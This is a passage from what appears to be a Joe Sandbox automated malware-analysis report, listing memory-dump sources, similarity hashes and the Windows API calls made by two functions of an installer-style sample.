                                                          • Associated: 00000007.00000002.3198133351.0000000000407000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.3198146602.0000000000409000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.3198165131.0000000000449000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_Ultradolichocephaly.jbxd
                                                          Similarity
                                                          • API ID: CloseCreateHandleProcess
                                                          • String ID: Error launching installer
                                                          • API String ID: 3712363035-66219284
                                                          • Opcode ID: 47fe2490e17a7e9d962cab7a6b56508ed3a0dd8216b7049c1380fae9186fb834
                                                          • Instruction ID: eccce0787fa873eefbebbfab998d1c477025fc2f998d9ab7e00b955d4b23de72
                                                          • Opcode Fuzzy Hash: 47fe2490e17a7e9d962cab7a6b56508ed3a0dd8216b7049c1380fae9186fb834
                                                          • Instruction Fuzzy Hash: 99E0BFB4A00209BFEB119B64ED05F7B7BACE700704F408561BD11F2190E774A8559A79
                                                          Function 00405907 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405B64,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405917
                                                          • lstrcmpiA.KERNEL32(00000000,00000000), ref: 0040592F
                                                          • CharNextA.USER32(00000000,?,00000000,00405B64,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405940
                                                          • lstrlenA.KERNEL32(00000000,?,00000000,00405B64,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405949
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.3198119429.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000007.00000002.3198052124.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.3198133351.0000000000407000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.3198146602.0000000000409000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.3198165131.0000000000449000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_Ultradolichocephaly.jbxd
                                                          Similarity
                                                          • API ID: lstrlen$CharNextlstrcmpi
                                                          • String ID:
                                                          • API String ID: 190613189-0
                                                          • Opcode ID: d250403eeccc32afa1460bd507a63d74f6ad2c43926490d4129708a4008c1f50
                                                          • Instruction ID: 9438e9cad6691fea7f13f8d56426e11099e03f26c07faecbb185dc05f13043cf
                                                          • Opcode Fuzzy Hash: d250403eeccc32afa1460bd507a63d74f6ad2c43926490d4129708a4008c1f50
                                                          • Instruction Fuzzy Hash: D5F06236505518FFCB129FA5DC00D9EBBA8EF16360B2540B9F800F7350D674EE01ABA9